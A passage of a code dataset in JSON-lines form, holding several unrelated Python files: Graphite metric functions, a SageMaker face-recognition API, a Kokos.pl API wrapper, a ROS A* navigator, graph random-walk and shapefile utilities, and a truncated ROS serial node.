selected metrics shifted in time. If no sign is given, a minus\n sign ( - ) is implied which will shift the metric back in time. If a plus\n sign ( + ) is given, the metric will be shifted forward in time.\n\n Will reset the end date range automatically to the end of the base stat\n unless reset_end is False. Example case is when you timeshift to last week\n and have the graph date range set to include a time in the future, will\n limit this timeshift to pretend ending at the current time. If reset_end is\n False, will instead draw full range including future time.\n\n Useful for comparing a metric against itself at a past periods or\n correcting data stored at an offset.\n\n Example::\n\n &target=time_shift(Sales.widgets.largeBlue,\"7d\")\n &target=time_shift(Sales.widgets.largeBlue,\"-7d\")\n &target=time_shift(Sales.widgets.largeBlue,\"+1h\")\n\n \"\"\"\n from graphite.evaluator import evaluateTarget\n\n if not series_list:\n return []\n # Default to negative. parseTimeOffset defaults to +\n if time_shift[0].isdigit():\n time_shift = '-' + time_shift\n delta = parseTimeOffset(time_shift)\n new_ctx = ctx.copy()\n new_ctx['startTime'] = ctx['startTime'] + delta\n new_ctx['endTime'] = ctx['endTime'] + delta\n results = []\n # if len(series_list) > 1, they will all have the same pathExpression,\n # which is all we care about.\n series = series_list[0]\n for shifted_series in evaluateTarget(new_ctx, series.pathExpression):\n shifted_series.set_name('time_shift(%s, %s)' % (\n shifted_series.name, time_shift))\n if reset_end:\n shifted_series.end = series.end\n else:\n shifted_series.end = (\n shifted_series.end - shifted_series.start + series.start)\n shifted_series.start = series.start\n results += [shifted_series]\n return results\n\n\n@api(\"sumSeriesWithWildcards\")\ndef sumSeriesWithWildcards(ctx, series_list, *positions):\n \"\"\"\n Call sumSeries after inserting wildcards at the given position(s).\n\n Example::\n\n 
&target=sumSeriesWithWildcards(host.cpu-[0-7].cpu-{user,system}.value,\n 1)\n\n This would be the equivalent of::\n\n &target=sumSeries(host.*.cpu-user.value)&target=sumSeries(\n host.*.cpu-system.value)\n\n \"\"\"\n newSeries = {}\n new_names = list()\n\n for series in series_list:\n newname = '.'.join(map(lambda x: x[1],\n filter(lambda i: i[0] not in positions,\n enumerate(series.name.split('.')))))\n if newname in newSeries:\n newSeries[newname] = sumSeries(ctx,\n (series, newSeries[newname]))[0]\n else:\n newSeries[newname] = series\n new_names.append(newname)\n newSeries[newname].name = newname\n\n return [newSeries[name] for name in new_names]\n\n\n@api(\"transformNull\")\ndef transformNull(ctx, series_list, default=0):\n \"\"\"\n Takes a metric or wild card series_list and an optional value\n to transform Nulls to. Default is 0. This method compliments\n drawNullAsZero flag in graphical mode but also works in text only\n mode.\n\n Example::\n\n &target=transformNull(webapp.pages.*.views,-1)\n\n This would take any page that didn't have values and supply negative 1 as\n a default. 
Any other numeric value may be used as well.\n \"\"\"\n def transform(v):\n if v is None:\n return default\n else:\n return v\n\n for series in series_list:\n series.apply(transform, safe=False)\n series.set_name(\"transformNull(%s,%g)\" % (series.name, default))\n return series_list\n\n## Graphite functions to be ported from graphite/functions\n## Remove appropriative lines for ported functions\n# # Combine functions\n# 'weightedAverage': weightedAverage,\n# # Transform functions\n# 'scaleToSeconds': scaleToSeconds,\n# 'perSecond': perSecond,\n# 'timeStack': timeStack,\n# 'summarize': summarize,\n# 'smartSummarize': smartSummarize,\n# 'hitcount': hitcount,\n# # Calculate functions\n# 'movingAverage': movingAverage,\n# 'movingMedian': movingMedian,\n# 'stdev': stdev,\n# 'holtWintersForecast': holtWintersForecast,\n# 'holtWintersConfidenceBands': holtWintersConfidenceBands,\n# 'holtWintersConfidenceArea': holtWintersConfidenceArea,\n# 'holtWintersAberration': holtWintersAberration,\n# 'asPercent': asPercent,\n# 'pct': asPercent,\n# 'diffSeries': diffSeries,\n# 'divideSeries': divideSeries,\n# # Series Filter functions\n# 'mostDeviant': mostDeviant,\n# 'highestCurrent': highestCurrent,\n# 'lowestCurrent': lowestCurrent,\n# 'highestMax': highestMax,\n# 'currentAbove': currentAbove,\n# 'currentBelow': currentBelow,\n# 'averageOutsidePercentile': averageOutsidePercentile,\n# 'removeBetweenPercentile': removeBetweenPercentile,\n# 'sortByMaxima': sortByMaxima,\n# 'sortByMinima': sortByMinima,\n# 'useSeriesAbove': useSeriesAbove,\n# 'exclude': exclude,\n# # Data Filter functions\n# 'removeAbovePercentile': removeAbovePercentile,\n# 'removeAboveValue': removeAboveValue,\n# 'removeBelowPercentile': removeBelowPercentile,\n# 'removeBelowValue': removeBelowValue,\n# # Special functions\n# 'legendValue': legendValue,\n# 'cumulative': cumulative,\n# 'consolidateBy': consolidateBy,\n# 'keepLastValue': keepLastValue,\n# 'changed': changed,\n# 'secondYAxis': secondYAxis,\n# 
'substr': substr,\n# 'group': group,\n# 'reduce': reduceSeries,\n# 'groupByNode': groupByNode,\n# 'constantLine': constantLine,\n# 'stacked': stacked,\n# 'areaBetween': areaBetween,\n# 'threshold': threshold,\n# 'aggregateLine': aggregateLine\n","sub_path":"pm/apps/render/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":39293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"325872511","text":"from io import BytesIO\nimport json\nimport cgi\nimport os\n\nfrom chalice import Chalice\n\nimport boto3\nfrom email.message import Message\n\napp = Chalice(app_name='face-recognition-api')\napp.debug = True\n\nclient = boto3.client('runtime.sagemaker',\n\t\t\t\t\t region_name = \"eu-west-2\") # Remember that region has to be exactly the same everywhere\n\n\"\"\"Function, which is automatically trigerred when the endpoint receives a POST request.\n It accepts only 'multipart/form-data' request type, otherwise it returns an error code. \n\n Returns:\n Response - it contains a list of students present in the class, confidence and face coordinates for each student.\t\n\"\"\"\n\n@app.route('/', methods=['POST'], content_types=['multipart/form-data'], cors=True)\ndef handle_data():\n\n\t\"\"\"Function, which implements parsing a multipart/form-data request type.\n\t Reference: \n\t https://github.com/aws/chalice/issues/796\n\n\t This has to be implemented since Chalice microservice itself cannot \n\t parse this type of request. \n\n\t Returns:\n\t a dictionary of all of the fields in the multipart/form-data request. 
\t \n\t\"\"\"\n\t\n\tdef _get_parts():\n\n\t rfile = BytesIO(app.current_request.raw_body)\n\t content_type = app.current_request.headers['content-type']\n\t _, parameters = cgi.parse_header(content_type)\n\t parameters['boundary'] = parameters['boundary'].encode('utf-8')\n\t parsed = cgi.parse_multipart(rfile, parameters)\n\t return parsed\n\n\t# Retrieve all parts of the request\n\tfiles = _get_parts()\n\tdictionary = {k: v[0].decode('utf-8') for (k, v) in files.items()} \n\timage = dictionary['image']\n\tdata = {\n\n\t\t \"school_name\": dictionary['school_name'],\n\t \"students_list\": json.dumps(dictionary['students_list'])\n\t}\n\n\tendpoint = dictionary['endpoint']\n\n\t# Send a request to the proper endpoint, which is hidden in AWS structures by default.\n\t\n\tresponse = client.invoke_endpoint(EndpointName = endpoint, \n\t\t\t\t\t\t\t\t\t ContentType = 'application/x-image',\n Body = image,\n Accept = str(data) # This should be CustomAttributes, however:\n )\t # - this header can be used only in python 3.7\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t # - unfortunately, in python 3.7 we are not able to parse \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t # multipart/form-data request type, see for reference:\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t # https://github.com/python/cpython/pull/8530\n\tresponse_body = response['Body']\n\treturn response_body.read()\n\t\n\n\n","sub_path":"opt/program/face-recognition/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"563807490","text":"from grand.datasets import load_vehicles, load_artificial_toy\nfrom grand import IndividualAnomalyInductive\n\nif __name__ == '__main__':\n \n # Get data from one unit (vehicle)\n dataset = load_artificial_toy(0) #load_vehicles()\n unit1_train = [ x for dt, x in dataset.stream_unit(1) ] # we use unit number 1 for training\n\n # Create an instance of IndividualAnomalyInductive\n indev = 
IndividualAnomalyInductive( w_martingale=15, # Window size for computing the deviation level\n non_conformity=\"median\", # Strangeness measure: \"median\" or \"knn\" or \"lof\"\n k=50, # Used if non_conformity is \"knn\"\n dev_threshold=.6) # Threshold on the deviation level\n\n # Fit the IndividualAnomalyInductive detector to unit1_train\n indev.fit(unit1_train)\n\n # At each time step dt, a data-point x comes from the stream of unit number 0\n for dt, x in dataset.stream_unit(0):\n devContext = indev.predict(dt, x)\n \n st, pv, dev, isdev = devContext.strangeness, devContext.pvalue, devContext.deviation, devContext.is_deviating\n print(\"Time: {} ==> strangeness: {}, p-value: {}, deviation: {} ({})\".format(dt, st, pv, dev, \"high\" if isdev else \"low\"))\n\n # Plot p-values and deviation level over time\n indev.plot_deviations()\n","sub_path":"examples/individual_deviation_inductive_example.py","file_name":"individual_deviation_inductive_example.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606325906","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nKokos\n~~~~~\nProsty wrapper na api Kokos.pl\n\nauthor: Satanowski \n\"\"\"\n\nfrom datetime import datetime\nfrom time import sleep\nimport requests, zlib\n\nextd_dict = lambda x, y: dict(list(x.items()) + list(y.items()))\n\nclass Kokos(object):\n \"Kokos WebAPI wrapper\"\n\n API_URL = \"https://kokos.pl/webapi/\"\n\n PARAMETERS = [\"user_id\", \"user\", \"title\", \"status\", \"valueFrom\", \"valueTo\",\\\n \"periodFrom\", \"periodTo\", \"percentFrom\", \"percentTo\", \"completedFrom\",\\\n \"completedTo\", \"investorsFrom\", \"investorsTo\", \"rating\", \"province\", \\\n \"insuranceNumber\", \"insuranceFirm\", \"isAllegroVerified\", \"intent\",\\\n \"page\"]\n\n AUCTION_STATUS = [100, 110, 500, 1100, 1200, 1300, 1400, 1500]\n\n\n def __init__(self, api_key=\"\"):\n self.api_key = api_key\n self.last_request = 
datetime.now()\n\n\n def _query(self, method, parameters, **kwargs):\n \"Make HTTP request to Kokos.pl WebAPI\"\n\n payload = {\n \"type\":\"json\",\n \"key\":self.api_key\n }\n\n if parameters:\n payload = extd_dict(payload, parameters)\n payload = extd_dict(payload, kwargs)\n\n while (datetime.now() - self.last_request).seconds < 1:\n #do not exceed API limit of req/second\n sleep(0.25)\n\n r = requests.get(Kokos.API_URL+method, params=payload)\n self.last_request = datetime.now()\n\n head = r.headers.get('content-type')\n if r.status_code == 200:\n if \"application/json\" in head:\n return r.json()\n elif \"text/html\" in head and method == \"get-auctions-by-status\":\n try:\n raw = zlib.decompress(r.content, 16+zlib.MAX_WBITS)\n except:\n raw = None\n if not raw:\n return None\n now = datetime.now()\n fname = \"auctions_by_status-%d_%d_%d.json\" % \\\n (now.year, now.month, now.day)\n try:\n with open(fname, \"wb\") as f:\n f.write(raw)\n except IOError:\n print(\"Nie można zapisać pliku: \" + fname)\n\n return fname\n return None\n\n\n\n def get_auction_data(self, auction_id, comments=False):\n \"Pobranie szczegółowych danych jednej wybranej aukcji.\"\n\n resp = self._query(\"get-auction-data\", None, id=auction_id, \\\n comments=comments and \"1\" or \"0\")\n if resp:\n return resp.get(\"response\").get(\"auction\")\n\n return None\n\n\n def get_auctions_by_status(self, status):\n \"Pobranie listy pożyczek według statusu.\"\n\n if not status in Kokos.AUCTION_STATUS:\n return None\n\n resp = self._query(\"get-auctions-by-status\", None, status=status)\n\n if resp:\n print(\"Pobrane dane zapisano do pliku: \" + resp)\n return True\n\n return None\n\n\n def search(self, params=None):\n \"Wyszukiwanie aukcji według podanych parametrów.\"\n\n par = params or {}\n [par.pop(k) for k in par.keys() if not k in Kokos.PARAMETERS]\n\n resp = self._query(\"search\", par)\n if resp:\n return resp.get(\"response\")\n return None\n\n\n def get_most_popular_auctions(self, 
records=10):\n \"Pobranie najbardziej popularnych aukcji.\"\n resp = self._query(\"get-most-popular-auctions\", None, records=records)\n if resp:\n return resp.get(\"response\").get(\"auctions\")\n return None\n\n\n def get_recent_auctions(self, records=10, page=1):\n \"Pobranie ostatnio założonych aukcji.\"\n\n resp = self._query(\"get-recent-auctions\", None, records=records, page=page)\n if resp:\n return resp.get(\"response\").get(\"auctions\")\n return None\n\n\n def get_recent_payments(self, records=10):\n \"Pobranie ostatnich wpłat za raty.\"\n\n resp = self._query(\"get-recent-payments\", None, records=records)\n if resp:\n return resp.get(\"response\").get(\"payments\")\n return None\n\n\n def get_recent_investments(self, records=10):\n \"Pobranie najnowszych inwestycji.\"\n\n resp = self._query(\"get-recent-investments\", None, records=records)\n if resp:\n return resp.get(\"response\").get(\"investments\")\n return None\n\n\n def get_ended_auctions_amount(self, records=10, page=1):\n \"Pobranie sumy wartości aukcji zakończonych sukcesem.\"\n resp = self._query(\"get-ended-auctions-amount\", None, records=records, \\\n page=page)\n\n if resp:\n return resp.get(\"response\")\n return None\n\n\n def get_service_stats(self):\n \"Pobranie statystyk serwisu.\"\n resp = self._query(\"get-service-stats\", None)\n\n if resp:\n return resp.get(\"response\").get(\"serviceStats\")\n\n return None\n\n\n def get_user_id_by_nick(self, nick):\n \"Pobranie ID użytkownika na podstawie jego nick-u.\"\n\n resp = self._query(\"get-user-id-by-nick\", None, \\\n nick=nick)\n if resp:\n return resp.get(\"response\").get(\"user\")\n\n return None\n\n\n def get_payment_stats(self, year_month):\n \"Pobranie statystyk spłacalności dla całego serwisu.\"\n\n resp = self._query(\"get-payment-stats\", None, \\\n yearMonth=year_month)\n\n return resp.get(\"response\") or None\n\n\n def get_vindication_stats(self):\n \"Pobranie statystyk spłacalności.\"\n\n resp = 
self._query(\"get-vindication-stats\", None)\n if resp:\n return resp.get(\"response\")\n return None\n\n\n\n\n\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestSuite(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.apikey = \"\"\n while not cls.apikey:\n cls.apikey = input('Enter your API key:')\n\n cls.kokos = Kokos(cls.apikey)\n\n def test_get_payment_stats(self):\n self.assertIsNotNone(TestSuite.kokos.get_payment_stats(\"201212\"))\n\n def test_get_user_id_by_nick(self):\n self.assertIsNotNone(TestSuite.kokos.get_user_id_by_nick(\"Interstellar\"))\n\n def test_get_service_stats(self):\n self.assertIsNotNone(TestSuite.kokos.get_ended_auctions_amount())\n\n def test_get_recent_investments(self):\n self.assertIsNotNone(TestSuite.kokos.get_recent_investments())\n\n def test_get_recent_payments(self):\n self.assertIsNotNone(TestSuite.kokos.get_recent_payments())\n\n def test_get_recent_auctions(self):\n self.assertIsNotNone(TestSuite.kokos.get_recent_auctions())\n\n def test_get_most_popular_auctions(self):\n self.assertIsNotNone(TestSuite.kokos.get_most_popular_auctions())\n\n def test_get_auctions_by_status(self):\n self.assertIsNotNone(TestSuite.kokos.get_auctions_by_status(100))\n\n def test_get_auction_data(self):\n self.assertIsNotNone(TestSuite.kokos.get_auction_data(145838))\n\n def test_search(self):\n self.assertIsNotNone(TestSuite.kokos.search({\"user\":\"Interstellar\"}))\n\n def test_get_vindication_stats(self):\n self.assertIsNotNone(TestSuite.kokos.get_vindication_stats())\n\n unittest.main()\n","sub_path":"src/kokos.py","file_name":"kokos.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"240319524","text":"import os, glob, shutil\n\n\n\n# This script renames the individual files in a folder by concatenate\n# the folder name and file name (usually just numbers)\n\ninputFolder = 
'/Volumes/ShaoheGtech/2019-1-Shaohe/190130-spheroids-by-Kaz/MDCKII-SIMS/'\n\nfolderList = glob.glob(inputFolder + \"*/\")\n\nfor folder in folderList:\n\tprint(folder)\n\tfolderName = folder.split(\"/\")[-2]\n\tprint(folderName)\n\tfileList = glob.glob(folder + \"*\")\n\tfor f in fileList:\n\t\tnewFileName = inputFolder + folderName + \"-\" + f.split(\"/\")[-1]\n\t\tprint(newFileName)\n\t\tos.rename(f, newFileName)\n\nfor folder in folderList:\n\tshutil.rmtree(folder)\n","sub_path":"renameFilesByPrefixingFolderName.py","file_name":"renameFilesByPrefixingFolderName.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212748403","text":"#!/usr/bin/env python\n\nimport rospy\nfrom nav_msgs.msg import MapMetaData, OccupancyGrid\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tf\nfrom std_msgs.msg import Float32MultiArray, Bool\nfrom astar import AStar, DetOccupancyGrid2D, StochOccupancyGrid2D\nfrom nav_msgs.msg import Path\nfrom geometry_msgs.msg import PoseStamped\nimport pdb\n\nclass Navigator:\n\n def __init__(self):\n rospy.init_node('navigator', anonymous=True)\n\n self.plan_resolution = .15\n self.plan_horizon = 15\n self.replan_threshold = self.plan_resolution*0.3\n\n self.map_width = 0\n self.map_height = 0\n self.map_resolution = 0\n self.map_origin = [0,0]\n self.map_probs = []\n self.occupancy = None\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n self.last_path = None\n self.has_robot_location = False\n self.tries = 0\n\n self.nav_sp = None\n self.pose_sp = (0.0,0.0,0.0)\n\n self.trans_listener = tf.TransformListener()\n\n rospy.Subscriber(\"map\", OccupancyGrid, self.map_callback)\n rospy.Subscriber(\"map_metadata\", MapMetaData, self.map_md_callback)\n rospy.Subscriber(\"/turtlebot_controller/nav_goal\", Float32MultiArray, self.nav_sp_callback)\n\n self.pose_sp_pub = rospy.Publisher('/turtlebot_controller/position_goal', Float32MultiArray, 
queue_size=10)\n self.nav_path_pub = rospy.Publisher('/turtlebot_controller/path_goal', Path, queue_size=10)\n # publish status of astar\n self.astar_status = rospy.Publisher('/turtlebot_controller/astar_status', Bool, queue_size=10)\n # waypoint done\n self.waypoint_done = rospy.Publisher('/turtlebot_control/waypoint_done', Bool, queue_size=10)\n\n def map_md_callback(self,msg):\n self.map_width = msg.width\n self.map_height = msg.height\n self.map_resolution = msg.resolution\n self.map_origin = (msg.origin.position.x,msg.origin.position.y)\n\n def map_callback(self,msg):\n self.map_probs = msg.data\n if self.map_width>0 and self.map_height>0 and len(self.map_probs)>0:\n self.occupancy = StochOccupancyGrid2D(self.map_resolution,\n self.map_width,\n self.map_height,\n self.map_origin[0],\n self.map_origin[1],\n int(self.plan_resolution / self.map_resolution*2.3),\n self.map_probs)\n if self.has_robot_location and self.nav_sp:\n state_min = (-int(round(self.plan_horizon)), -int(round(self.plan_horizon)))\n state_max = (int(round(self.plan_horizon)), int(round(self.plan_horizon)))\n x_init = (round(self.x/self.plan_resolution)*self.plan_resolution, round(self.y/self.plan_resolution)*self.plan_resolution)\n x_goal = (round(self.nav_sp[0]/self.plan_resolution)*self.plan_resolution, round(self.nav_sp[1]/self.plan_resolution)*self.plan_resolution)\n astar = AStar(state_min,state_max,x_init,x_goal,self.occupancy,self.plan_resolution)\n\n if self.last_path and astar.check_path(self.last_path):\n rospy.logwarn(\"Last computed path is still valid\")\n self.send_controller_goal()\n else:\n self.send_pose_sp() # every time the map changes, we need to update our astar path. 
(also updates the position goal)\n\n def nav_sp_callback(self,msg):\n new_nav_sp = (msg.data[0],msg.data[1],msg.data[2])\n if not self.nav_sp:\n self.nav_sp = (msg.data[0],msg.data[1],msg.data[2])\n self.send_pose_sp()\n rospy.logwarn('Initializing target (should only happen at bootup)')\n elif ((new_nav_sp[2]-self.nav_sp[2])**2 + (new_nav_sp[1]-self.nav_sp[1])**2 + (new_nav_sp[0]-self.nav_sp[0])**2)>self.replan_threshold**2:\n self.nav_sp = (msg.data[0],msg.data[1],msg.data[2])\n rospy.logwarn('New target received, replanning')\n self.send_pose_sp()\n else:\n rospy.logwarn('Old target is close enough, will not replan')\n\n def send_controller_goal(self):\n path_to_robot_dist = np.array(map(lambda x: (x[1]-self.y)**2 + (x[0]-self.x)**2, self.last_path))\n track_lookahead = 4\n closest_pt = np.argmin(path_to_robot_dist)\n track_astar_step_no = min(closest_pt + track_lookahead, len(self.last_path) - 1) # we tell the controller to track the track_astar_step_no-th point in the A* path\n\n if len(self.last_path) > track_astar_step_no:\n # a naive path follower we could use\n # final_orientation_ctrl=np.arctan2(astar.path[track_astar_step_no][1]-astar.path[track_astar_step_no-1][1],astar.path[track_astar_step_no][1]-astar.path[track_astar_step_no-1][1])\n final_orientation_ctrl = np.arctan2(self.last_path[track_astar_step_no][1] - self.last_path[closest_pt][1],self.last_path[track_astar_step_no][1] - self.last_path[closest_pt][1])\n self.pose_sp = (self.last_path[track_astar_step_no][0], self.last_path[track_astar_step_no][1], final_orientation_ctrl)\n msg = Float32MultiArray()\n msg.data = self.pose_sp\n self.pose_sp_pub.publish(msg)\n # astar.plot_path()\n else:\n # when astar gives a single point, position goal is tag position\n msg = Float32MultiArray()\n msg.data = self.nav_sp\n self.pose_sp_pub.publish(msg)\n\n # needed for rviz\n path_msg = Path() # path message for rviz\n path_msg.header.frame_id = 'map' # path message for rviz\n for state in self.last_path: # 
for the astar solution found\n pose_st = PoseStamped() # path message for rviz\n pose_st.pose.position.x = state[0]\n pose_st.pose.position.y = state[1]\n pose_st.header.frame_id = 'map'\n path_msg.poses.append(pose_st)\n self.nav_path_pub.publish(path_msg)\n\n def update_location(self):\n try:\n (robot_translation,robot_rotation) = self.trans_listener.lookupTransform(\"/map\", \"/base_footprint\", rospy.Time(0))\n self.has_robot_location = True\n self.x = robot_translation[0]\n self.y = robot_translation[1]\n self.theta = tf.transformations.euler_from_quaternion(robot_rotation)[2]\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n robot_translation = (0,0,0)\n robot_rotation = (0,0,0,1)\n self.has_robot_location = False\n def send_pose_sp(self):\n\n\n if self.occupancy and self.has_robot_location and self.nav_sp:\n state_min = (-int(round(self.plan_horizon)), -int(round(self.plan_horizon)))\n state_max = (int(round(self.plan_horizon)), int(round(self.plan_horizon)))\n x_init = (round(self.x/self.plan_resolution)*self.plan_resolution, round(self.y/self.plan_resolution)*self.plan_resolution)\n x_goal = (round(self.nav_sp[0]/self.plan_resolution)*self.plan_resolution, round(self.nav_sp[1]/self.plan_resolution)*self.plan_resolution)\n astar = AStar(state_min,state_max,x_init,x_goal,self.occupancy,self.plan_resolution)\n\n rospy.logwarn(\"Computing navigation plan\")\n if astar.solve():\n self.tries = 0\n self.astar_status.publish(True)\n rospy.logwarn(\"A* solved\")\n self.last_path = astar.path\n self.send_controller_goal()\n\n else:\n rospy.logwarn(\"Could not find path\")\n\n\n\n\n self.tries += 1\n msg = Float32MultiArray()\n if self.tries % 2 == 1:\n rospy.logwarn(\"Could not find path: spin a bit to try free itself\")\n msg.data = (self.x, self.y, self.theta + np.pi/2)\n self.pose_sp_pub.publish(msg)\n elif astar.is_free((self.x + self.plan_resolution*np.cos(self.theta), self.y + self.plan_resolution*np.sin(self.theta))):\n 
rospy.logwarn(\"Could not find path: after spinning a bit, move forward\")\n msg.data = (self.x + self.plan_resolution*np.cos(self.theta), self.y + self.plan_resolution*np.sin(self.theta), self.theta)\n self.pose_sp_pub.publish(msg)\n\n self.astar_status.publish(False)\n \n self.last_path = None\n\n def run(self):\n rate = rospy.Rate(10) # 10 Hz\n while not rospy.is_shutdown():\n self.update_location()\n #if (np.linalg.norm(np.array([self.x, self.y]) - np.array([self.pose_sp[0], self.pose_sp[1]])) < self.plan_resolution*0.7) :\n \t#\t self.send_pose_sp()\n #rospy.logwarn(\"Arrived at pose_sp recomputing path\")\n rate.sleep()\n\n\n\n# to do: publish waypoint_done\n\nif __name__ == '__main__':\n nav = Navigator()\n nav.run()\n\npass\n\n","sub_path":"scripts/navigator.py","file_name":"navigator.py","file_ext":"py","file_size_in_byte":9122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35824802","text":"import numpy as np\nimport random\nclass MetaPathGenerator(object):\n def __init__(self):\n self.paper_author = dict ()\n self.author_paper = dict ()\n self.paper_org = dict ()\n self.org_paper = dict ()\n self.paper_conf = dict ()\n self.conf_paper = dict ()\n\n ##########read author's feature and write the paper's relation to files#######################\n def read_data (self, dirpath):\n temp = set ()\n with open (dirpath + \"/paper_org.txt\", encoding='utf-8') as pafile:\n for line in pafile:\n temp.add (line)\n for line in temp:\n toks = line.strip ().split (\"\\t\")\n if len (toks) == 2:\n p, a = toks[0], toks[1]\n if p not in self.paper_org:\n self.paper_org[p] = []\n self.paper_org[p].append (a)\n if a not in self.org_paper:\n self.org_paper[a] = []\n self.org_paper[a].append (p)\n temp.clear ()\n\n with open (dirpath + \"/paper_author.txt\", encoding='utf-8') as pafile:\n for line in pafile:\n temp.add (line)\n for line in temp:\n toks = line.strip ().split (\"\\t\")\n if len (toks) == 2:\n p, a = 
toks[0], toks[1]\n if p not in self.paper_author:\n self.paper_author[p] = []\n self.paper_author[p].append (a)\n if a not in self.author_paper:\n self.author_paper[a] = []\n self.author_paper[a].append (p)\n temp.clear ()\n\n with open (dirpath + \"/paper_conf.txt\", encoding='utf-8') as pcfile:\n for line in pcfile:\n temp.add (line)\n for line in temp:\n toks = line.strip ().split (\"\\t\")\n if len (toks) == 2:\n p, a = toks[0], toks[1]\n if p not in self.paper_conf:\n self.paper_conf[p] = []\n self.paper_conf[p].append (a)\n if a not in self.conf_paper:\n self.conf_paper[a] = []\n self.conf_paper[a].append (p)\n temp.clear ()\n\n # print (\"#papers \", len (self.paper_conf))\n # print (\"#authors\", len (self.author_paper))\n # print (\"#org_words\", len (self.org_paper))\n # print (\"#confs \", len (self.conf_paper))\n\n ######generate the random walk's meta path##############\n def generate_WMRW (self, outfilename, numwalks, walklength):\n outfile = open (outfilename, 'w')\n for paper0 in self.paper_conf:\n for j in range (0, numwalks): # wnum walks\n paper = paper0\n outline = \"\"\n i = 0\n while (i < walklength):\n i = i + 1\n if paper in self.paper_author:\n authors = self.paper_author[paper]\n numa = len (authors)\n authorid = random.randrange (numa)\n author = authors[authorid]\n\n papers = self.author_paper[author]\n nump = len (papers)\n if nump > 1:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n while paper1 == paper:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n paper = paper1\n outline += \" \" + paper\n\n if paper in self.paper_org:\n words = self.paper_org[paper]\n numw = len (words)\n wordid = random.randrange (numw)\n word = words[wordid]\n\n papers = self.org_paper[word]\n nump = len (papers)\n if nump > 1:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n while paper1 == paper:\n paperid = random.randrange (nump)\n paper1 = papers[paperid]\n paper = paper1\n outline += \" \" + paper\n\n 
outfile.write (outline + \"\\n\")\n outfile.close ()","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"463006020","text":"# Team 54\r\n# 1. Jian Lu 753184\r\n# 2.Pavel Tolmachev 848766\r\n# 3. Xiaoyang Wu 929595\r\n# 4. Da born 871643\r\n\r\npath= \"C:\\\\Users\\\\ptolmachev\\\\Documents\\\\0Study\\\\Cloud and cluster computing\\\\Assignment 2\\\\Boundaries_SA2\\\\SA2_2016_AUST.shp\"\r\n\r\nimport os\r\nimport shapefile\r\nimport numpy as np\r\nfrom operator import itemgetter\r\nimport pickle\r\n\r\ndef save_obj(obj, name ):\r\n with open(name + '.pkl', 'wb') as f:\r\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef load_obj(name ):\r\n with open(name + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\n \r\nREGION = \"VICTORIA\"\r\n\r\nprint(\"Reading coordinates file...\")\r\nsf = shapefile.Reader(path)\r\nshapes = sf.shapes()\r\nnames = sf.records()\r\nnames = list(map(itemgetter(2), sf.records()))\r\nstate = list(map(itemgetter(10), sf.records()))\r\nprint(\"regions loaded: \", len(names))\r\n\r\nregionCode_RegionName = []\r\nregionCode_Polygons = []\r\n\r\nfor i in range(len(names)):\r\n if (len(shapes[i].points) != 0) and (state[i].upper() == \"VICTORIA\"):\r\n regionCode_RegionName.append(names[i].upper())\r\n regionCode_Polygons.append(shapes[i].points)\r\n\r\nprint(\"Coordinates reading complete.\")\r\nfor i in range(len(regionCode_RegionName)):\r\n if(len(regionCode_Polygons[i]) == 0):\r\n print(regionCode_RegionName[i],regionCode_Polygons[i])\r\n\r\n\r\nprint(\"Generating regions map...\")\r\nregionCode_Lontitude = []\r\nregionCode_Latitude = []\r\nregions = dict()\r\n\r\nfor i in range(len(regionCode_RegionName)):\r\n center = np.mean(regionCode_Polygons[i],axis = 0)\r\n regions[regionCode_RegionName[i]] = [regionCode_Polygons[i],center]\r\n # centerOfRegions[regionCode_RegionName[i]] = 
center\r\n# print(\"Regions map generated.\")\r\n\r\n# print(ocateRegion(lontitude,latitude,regionNumberLontitude,regionNumberLatitude))\r\n\r\nname = \"SA2_polygons_\" + REGION\r\nsave_obj(regions, name)\r\nprint(\"the resulting dictionary is saved into: \" + name+ '.pkl')","sub_path":"SA2_dictionary.py","file_name":"SA2_dictionary.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"485082968","text":"import rclpy\nfrom rclpy.node import Node\nimport serial\n\nfrom std_msgs.msg import Bool\n\n\nclass EyeNode(Node):\n def __init__(self):\n super().__init__('eye_node')\n self.get_logger().info('EyeNode started')\n self.eye_listener = self.create_subscription(Bool, 'eye_control', self.eye_callback, 10)\n self.eye_publisher = self.create_publisher(Bool, 'eye_status', 10)\n self.port = serial.Serial(\"/dev/cu.usbmodem14201\", 115200)\n self.timer = self.create_timer(0.5, self.eye_status)\n\n def eye_callback(self, msg):\n if msg.data == True:\n self.port.write(b\"o\")\n self.get_logger().info(\"Eye are opening...\")\n else:\n self.port.write(b\"c\")\n self.get_logger().info(\"Eye are closing...\")\n\n def eye_status(self):\n msg = Bool()\n self.port.write(b\"s\")\n status = 